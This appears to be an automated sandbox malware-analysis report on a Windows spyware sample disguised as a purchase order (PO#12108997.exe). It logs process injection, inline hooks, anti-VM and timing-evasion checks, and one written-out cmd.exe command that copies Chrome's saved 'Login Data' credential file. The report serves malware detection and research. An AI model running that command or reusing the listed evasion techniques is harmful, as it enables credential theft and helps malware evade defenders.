Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A995D0 NtClose,LdrInitializeThunk, 17_2_04A995D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99560 NtWriteFile,LdrInitializeThunk, 17_2_04A99560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99540 NtReadFile,LdrInitializeThunk, 17_2_04A99540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A996E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_04A996E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A996D0 NtCreateKey,LdrInitializeThunk, 17_2_04A996D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99610 NtEnumerateValueKey,LdrInitializeThunk, 17_2_04A99610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_04A99660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99650 NtQueryValueKey,LdrInitializeThunk, 17_2_04A99650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99780 NtMapViewOfSection,LdrInitializeThunk, 17_2_04A99780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99FE0 NtCreateMutant,LdrInitializeThunk, 17_2_04A99FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99710 NtQueryInformationToken,LdrInitializeThunk, 17_2_04A99710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99770 NtSetInformationFile,LdrInitializeThunk, 17_2_04A99770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_04A99860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99840 NtDelayExecution,LdrInitializeThunk, 17_2_04A99840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A999A0 NtCreateSection,LdrInitializeThunk, 17_2_04A999A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_04A99910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A50 NtCreateFile,LdrInitializeThunk, 17_2_04A99A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A995F0 NtQueryInformationFile, 17_2_04A995F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99520 NtWaitForSingleObject, 17_2_04A99520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9AD30 NtSetContextThread, 17_2_04A9AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99670 NtQueryInformationProcess, 17_2_04A99670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A997A0 NtUnmapViewOfSection, 17_2_04A997A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99730 NtQueryVirtualMemory, 17_2_04A99730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9A710 NtOpenProcessToken, 17_2_04A9A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99760 NtOpenProcess, 17_2_04A99760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9A770 NtOpenThread, 17_2_04A9A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A998A0 NtWriteVirtualMemory, 17_2_04A998A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A998F0 NtReadVirtualMemory, 17_2_04A998F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99820 NtEnumerateKey, 17_2_04A99820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9B040 NtSuspendThread, 17_2_04A9B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A999D0 NtCreateProcessEx, 17_2_04A999D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99950 NtQueueApcThread, 17_2_04A99950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A80 NtOpenDirectoryObject, 17_2_04A99A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A20 NtResumeThread, 17_2_04A99A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A00 NtProtectVirtualMemory, 17_2_04A99A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99A10 NtQuerySection, 17_2_04A99A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A9A3B0 NtGetContextThread, 17_2_04A9A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99B00 NtSetValueKey, 17_2_04A99B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA360 NtCreateFile, 17_2_007DA360
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA410 NtReadFile, 17_2_007DA410
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA490 NtClose, 17_2_007DA490
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA540 NtAllocateVirtualMemory, 17_2_007DA540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA35A NtCreateFile,NtReadFile, 17_2_007DA35A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA3B2 NtCreateFile, 17_2_007DA3B2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA40A NtReadFile, 17_2_007DA40A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DA5BA NtAllocateVirtualMemory, 17_2_007DA5BA
Sample file is different than original file name gathered from version info
Source: PO#12108997.exe Binary or memory string: OriginalFilename vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000000.236724294.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000002.276802246.0000000007E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
Source: PO#12108997.exe, 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
Source: PO#12108997.exe Binary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
Source: PO#12108997.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: PO#12108997.exe Virustotal: Detection: 34%
Source: PO#12108997.exe ReversingLabs: Detection: 61%
Source: PO#12108997.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO#12108997.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PO#12108997.exe "C:\Users\user\Desktop\PO#12108997.exe"
Source: C:\Users\user\Desktop\PO#12108997.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO#12108997.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#12108997.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\DB1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@2/2
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_01
Source: C:\Windows\SysWOW64\cmmon32.exe File written: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini Jump to behavior
Source: PO#12108997.exe, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: PO#12108997.exe, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: PO#12108997.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO#12108997.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: PO#12108997.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: PO#12108997.exe, rI/hS.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PO#12108997.exe Code function: 0_2_092D3E12 push ecx; ret 0_2_092D3E19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00417095 push cs; ret 4_2_004171E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00416B77 push ss; iretd 4_2_00416B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D4C5 push eax; ret 4_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00417CD7 pushfd ; retf 4_2_00417D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D57C push eax; ret 4_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D512 push eax; ret 4_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041D51B push eax; ret 4_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055CD0D1 push ecx; ret 4_2_055CD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AAD0D1 push ecx; ret 17_2_04AAD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007D7095 push cs; ret 17_2_007D71E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD9BC push ds; retf 17_2_007DD9BD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007D7CD7 pushfd ; retf 17_2_007D7D00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD4C5 push eax; ret 17_2_007DD518
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD57C push eax; ret 17_2_007DD582
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD51B push eax; ret 17_2_007DD582
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_007DD512 push eax; ret 17_2_007DD518
Source: initial sample Static PE information: section name: .text entropy: 7.74619611944

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PO#12108997.exe PID: 6956, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000007C9904 second address: 00000000007C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000007C9B7E second address: 00000000007C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6960 Thread sleep time: -45733s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6984 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 612 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00409AB0 rdtsc 4_2_00409AB0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\PO#12108997.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe API coverage: 7.6 %
Source: C:\Windows\SysWOW64\cmmon32.exe API coverage: 8.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Thread delayed: delay time: 45733 Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.340315869.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.279805713.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.294463797.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00409AB0 rdtsc 4_2_00409AB0
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05597D50 mov eax, dword ptr fs:[00000030h] 4_2_05597D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B3D43 mov eax, dword ptr fs:[00000030h] 4_2_055B3D43
